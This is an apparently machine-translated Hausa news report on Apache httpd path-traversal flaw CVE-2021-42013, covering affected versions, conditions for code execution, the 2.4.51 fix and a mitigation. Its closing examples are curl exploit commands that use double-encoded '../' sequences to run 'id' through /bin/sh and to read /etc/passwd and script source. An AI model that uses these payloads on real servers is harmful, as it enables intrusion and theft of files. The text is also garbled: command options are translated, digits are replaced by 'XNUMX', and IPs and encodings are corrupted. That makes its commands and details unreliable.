An samo sabon vector vector don uwar garken Apache http, wanda ya kasance ba a gyara shi ba a sabuntawar 2.4.50 kuma yana ba da damar yin amfani da fayiloli daga wuraren da ke wajen tushen tushen shafin. Bugu da ƙari, masu bincike sun samo hanyar da ke ba da izini, a gaban wasu saitunan da ba daidai ba, ba kawai don karanta fayilolin tsarin ba, har ma don aiwatar da lambar su a kan uwar garke. Matsalar tana bayyana ne kawai a cikin fitowar 2.4.49 da 2.4.50; ba a shafa sigar farko ba. Don kawar da sabon rauni, Apache httpd 2.4.51 an saki da sauri.
A ainihin sa, sabuwar matsala (CVE-2021-42013) tana kama da rashin lafiyar asali (CVE-2021-41773) a cikin 2.4.49, kawai bambanci shine daban-daban na ɓoye na "..." haruffa. Musamman ma, a cikin sakin 2.4.50 ikon yin amfani da jerin "% 2e" don ɓoye ma'ana an toshe shi, amma an rasa yiwuwar yin rikodin sau biyu - lokacin da aka ƙayyade jerin "%% 32% 65", uwar garken ta yanke shi. zuwa cikin "%2e" sannan zuwa cikin ".", i.e. Haruffan "../" da za a je zuwa kundin adireshi da ya gabata ana iya sanya su azaman ".%%32%65/".
Amma game da yin amfani da rauni ta hanyar aiwatar da lambar, wannan yana yiwuwa lokacin da aka kunna mod_cgi kuma ana amfani da hanyar tushe wacce aka ba da izinin aiwatar da rubutun CGI (misali, idan an kunna umarnin ScriptAlias ko kuma an ayyana tutar ExecCGI a cikin Umarnin Zabuka). Wani abin da ake buƙata don cin nasara hari shine a ba da damar shiga kundin adireshi tare da fayiloli masu aiwatarwa, kamar / bin, ko samun dama ga tushen tsarin fayil "/" a cikin saitunan Apache. Tun da irin wannan damar ba yawanci ana ba da ita ba, hare-haren aiwatar da lambar ba su da ɗan aikace-aikace ga tsarin gaske.
A lokaci guda, harin don samun abubuwan da ke cikin fayilolin tsarin sabani da rubutun tushen rubutun gidan yanar gizo, wanda mai amfani zai iya karantawa wanda sabar http ke gudana, ya kasance mai dacewa. Don aiwatar da irin wannan harin, ya isa a saita kundin adireshi akan rukunin yanar gizon ta amfani da umarnin "Alias" ko "ScriptAlias" (DocumentRoot bai isa ba), kamar "cgi-bin".
Misalin cin zarafi wanda ke ba ku damar aiwatar da aikin “id” akan sabar: curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%% 32% 65/.%% 32%65/.%%32%65/bin/sh' —bayanai 'echo Content-Nau'in: rubutu/bayani; amsawa; id' uid = 1 (daemon) gid = 1 (daemon) kungiyoyin = 1 (daemon)
Misali na cin zarafi wanda ke ba ku damar nuna abubuwan da ke cikin / sauransu/passwd da ɗayan rubutun gidan yanar gizo (don fitar da lambar rubutun, adireshin da aka ayyana ta hanyar “Alias” umarni, wanda ba a kunna aiwatar da rubutun ba, dole ne a ƙayyade. as the base directory): curl 'http://192.168.0.1 .32/cgi-bin/.%%65%32/.%%65%32/.%%%65%32/.%%65%32/.%%65%192.168.0.1/.% %32%65/etc/passwd' curl 'http: //32/aliaseddir/.%%65%32/.%%65%32/.%%65%32/.%%65%2/. %%XNUMX%XNUMX/usr/local/apacheXNUMX/cgi -bin/test.cgi'
Matsalar ta fi shafar ci gaba da sabuntawa kamar Fedora, Arch Linux da Gentoo, da kuma tashar jiragen ruwa na FreeBSD. Fakitin da ke cikin tsayayyen rassan rabe-raben sabar uwar garken Debian, RHEL, Ubuntu da SUSE ba su da lahani. Matsalar ba ta faruwa idan an hana samun damar yin amfani da kundayen adireshi a sarari ta amfani da saitin “na buƙatar duk an ƙi”.
source: budenet.ru